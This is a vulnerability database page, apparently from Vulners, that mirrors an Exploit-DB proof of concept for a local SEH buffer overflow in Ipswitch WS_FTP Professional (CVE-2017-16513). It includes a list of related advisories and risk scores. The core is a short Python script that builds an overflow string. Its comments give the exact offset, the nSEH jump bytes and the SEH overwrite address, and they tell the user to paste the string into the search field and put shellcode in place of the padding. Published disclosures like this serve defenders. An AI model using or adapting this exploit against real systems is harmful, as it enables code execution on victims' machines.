Lucene search
K

Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)

🗓️ 03 Nov 2017 00:00:00Reported by Kevin McGuiganType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

Ipswitch WS_FTP Professional 12.6.0.3 Local Buffer Overflow (SEH) Exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH) Exploit
6 Nov 201700:00
zdt
Circl
CVE-2017-16513
3 Nov 201700:00
circl
CNVD
Ipswitch WS_FTP Professional Buffer Overflow Vulnerability
9 Nov 201700:00
cnvd
CVE
CVE-2017-16513
3 Nov 201715:00
cve
Cvelist
CVE-2017-16513
3 Nov 201715:00
cvelist
EUVD
EUVD-2017-7707
7 Oct 202500:30
euvd
exploitpack
Ipswitch WS_FTP Professional 12.6.0.3 - Local Buffer Overflow (SEH)
3 Nov 201700:00
exploitpack
NVD
CVE-2017-16513
3 Nov 201715:29
nvd
OpenVAS
Ipswitch WS_FTP Professional < 12.6.0.3 Local Buffer Overflow Vulnerability
9 Nov 201700:00
openvas
OSV
CVE-2017-16513
3 Nov 201715:29
osv
Rows per page
#!/usr/bin/python
#Title: Ipswitch WS_FTP Professional Local Buffer Overflow (SEH)
#Author: Kevin McGuigan. Twitter: @_h3xagram
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.ipswitch.com
#Date: 03/11/2017
#Version: 12.6.03
#CVE: CVE-2017-16513
#Tested on: Windows 7 32-bit
#Use script to generate payload. Paste payload into search field, replace Ds with shellcode. 
#nSEH = "\x74\x08\x90\x90" 
#SEH = "\x31\x2D\x91\x23"

buffer = "A" * 840
nSEH = "B" * 4
SEH = "C" * 4


f = open ("poc.txt", "w")
f.write(buffer + nSEH + SEH + "D" * 200)
f.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Nov 2017 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 24.6
CVSS 37.8
EPSS0.02216
30